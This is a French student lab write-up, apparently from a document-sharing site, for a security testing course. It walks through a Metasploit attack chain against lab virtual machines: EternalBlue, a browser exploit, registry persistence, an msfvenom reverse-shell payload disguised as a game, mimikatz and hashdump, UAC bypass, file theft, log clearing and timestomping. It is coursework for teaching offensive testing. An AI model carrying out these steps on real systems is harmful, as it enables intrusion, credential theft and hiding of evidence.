Vous êtes sur la page 1sur 17

TP DE MAISON

EPREUVE : SECURITY TESTING AND ASSESSMENT

METASPLOIT : SYSTEM HACKING


Environnement de travail :
➢ Une machine virtuelle Windows 10 sur vmware workstation
➢ Une machine virtuelle Windows XP sur vmware workstation
➢ Une machine virtuelle Kali Linux sur Vmware Workstation

1-Rechercher des exploits avec searchsploit


La commande ci-dessous permet de rechercher des exploits liés à OpenSSH

La recherche nous affiche le titre des exploits, la description de leurs rôles, et le chemin
d’accès au fichier exploit
2-Compromettre un système avec Metasploit
➢ Lancement de Metasploit
Metasploit version 5.0.87-dev possède:
- 2006 modules exploits
-1096 modules auxiliaires

➢ Utilisation de l’exploit EthernalBlue


EthernalBlue est une faille de sécurité qui était présente dans les systèmes windows
antérieur à windows 10 qui n’ont pas effectué les mises à jour de sécurité (du bulletin de
sécurité) MS17-010 du 14 mars 2017. C’est cette faille qu’a exploité le logiciel malveillant
WannaCry (WannaCrypt) de type ransomware en mai 2017.

Nous obtenons une liste de modules contenant des codes exploits qui exploitent la faille
Eternalblue. Ici nous allons utiliser le module N°2 :
exploit/windows/smb/ms17_010_eternalblue et configurer l’adresse ip de la machine
cible : 192.168.211.22 avec la commande set RHOSTS 192.168.211.22.

Enfin l’attaque est lancé avec la commande : exploit


➢ Utilisation de Exploit-DB dans kali linux
La commande searchsploit recherche des « modules exploits » et « proof of concept » dans
le package Exploit-DB installé sur kali linux. Le terme proof of concept(PoC) est un code
exploit qui permet de mener une attaque inoffensive ne causant pas de dommage sur un
système ou un réseau démontrant de l’existence d’une faille de sécurité.

On remarque que ce sont des programmes python. Nous avons poussé la curiosité afin de
voir le contenu de ces codes python.
3-Obtenir les mots de passe en utilisant Meterpreter
Après avoir accédé à la machine windows XP à partir du meterpreter (Nous avons utilisé une
machine virtuelle windows XP pour le test), on charge le module mimikatz qui va se charger
de collecter les hashs des mots de passe. Mimikatz possède des packages a savoir : MSV,
SSP, LIVESSP. Ces packages peuvent être accessibles respectivement par les commandes
msv, ssp, livessp.
4-firefox exploit module in msfconsole, Client side vulnerabilities
Dans le document qui a servi de base à ce TP, ils ont utilisé un exploit lié au navigateur
firefox affectant les systèmes MacOS : exploit/osx/browser/mozilla_mchannel. Vu que nous
n’avions pas à notre disposition un système MacOS, nous avons utilisé un windows XP pour
la démonstration des exploits de metasploit lié aux navigateurs. En effet nous avons utilisé
le module exploit/windows/browser/ms14_064_ole_code_execution qui exploite la
vulnérabilité présente dans le navigateur Internet Explorer de windows XP :

Ici le module démarre un serveur sur notre machine kali qui est en mode écoute sur le port
8080 à l’adresse url : http://0.0.0.0:8080/denis ou http://192.168.211.11:8080/denis

Sur la machine windows XP lorsque la victime tape cette adresse URL dans le navigateur
Internet Explorer, une session meterpreter s’ouvre et nous donne accès à la machine de la
victime.
5-Persistence or maintaining access
registry persistence from metasploit
Un attaquant après avoir pris le control d’un système, ne veut pas avoir à reprendre les
mêmes étapes lorsqu’il reviendra pour entrer dans le système. La persistance est le fait de
maintenir son accès sur un système qui a déjà été compromis. Une option pour maintenir
son accès est d’installer un logiciel sur la machine de la victime qui pourra communiquer
avec la machine de l’attaquant. Les pare-feu laissent souvent passer le trafic sortant du
réseau interne tandis que le trafic entrant dans le réseau est minutieusement filtré.
Le module exploit/windows/local/registry_persistence permet d’installer un reverse shell
sur la machine de la victime qui va se connecter automatiquement à la machine de
l’attaquant lorsque l’utilisateur se connecte à la machine compromise. Cela se fera en
modifiant des clés de régistre pour stoquer une payload.

➢ 6-Using msfvenom to create payload


Ici on utilise une machine virtuelle windows 10 pour la machine de la victime.
C’est la création d’une payload unique non incrustée ou non cachée dans une application.
On utilise la commande suivante :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211. LPORT=3445 -f exe -
e x86/shikata_ga_nai -a x86 –b “\x00” –platform windows -o jeu_ipnet.exe
On démarre ensuite le serveur web: service apache2 start
et on copie la payload (jeu_ipnet) dans un dossier partagé du serveur web
On lance le multi/handler et on configure le LHOST=192.168.211.11 (machine de l’attaquant)
et le LPORT=4444
Sur le windows 10, la victime qui s’est connectée au serveur web de l’attaquant, télécharge
et exécute le fichier « jeu_ipnet » qui est la payload crée par l’attaquant.
Dès que le fichier est exécuté, en retour sur notre machine kali linux, une session
meterpreter s’ouvre et donne accès à la machine windows 10 :

Maintenant qu’on a accès à la machine windows 10, on peut exécuter les commandes du
meterpreter pour avoir plus d’info sur la machine : sysinfo, ipconfig, cd, cat download,
shell…
Fichier « TOP PRIVE.txt » télécharger de la machine windows 10 vers notre machine kali linux
Après accès au shell de la machine windows 10, on a créé un fichier « message_hack » pour
spécifier à la victime que sa machine a été hacker :
echo ‘Ta machine a été hacké, signé Blow’ > message_hack.txt

7-Privilege Escalation
getting system patch information se fait par la commande: systeminfo > patches.txt
La commande « hashdump » ou « run post/windows/gather/smart_hashdump » ou « run
post/windows/gather/hashdump » pour la récupération des hash des mots de passe
utilisateur requiert l’élévation de privilège :

Pour l’élévation de privilège sur windows 10, nous avons utilisé la commande : getsystem –t
1 utilisant la méthode Named Pipe Impersonation.
Le module exploit/windows/local/bypassuac_fodhelper a été nécessaire pour avoir accès à
l’utilisateur « Autorité NT/System » :
Elévation de privilège réussie ci-dessous :

8-Gathering Passwords
L’élévation de privilège étant réussie, on exécute avec succès la commande: «run
post/windows/gather/smart_hashdump » ou « run post/windows/gather/hashdump »
pour avoir les hash des mots de passe du système windows 10

9-Cracking passwords with john the ripper


10-Covering tracks
➢ clearev
Dans le meterpreter on peut effacer les logs du système compromis avec la commande :
meterpreter>clearev
➢ Timestomping files
Lorsqu’on accède à un fichier sur le système compromis, et que l’on le modifie, le système
enregistre la date et l’heure de dernière modification, de création du fichier, et d’accès au
fichier. Le Timestomping permet de modifier ces paramètres ou attributs du fichier appelés
attributs MACE. Par exemple lorsqu’on accède à un fichier sur le sytème compromis, il faut
reparamétrer ces attributs MACE pour que la victime ou l’ingénieur informaticien ne
constate pas que le fichier a été modifié.

Vous aimerez peut-être aussi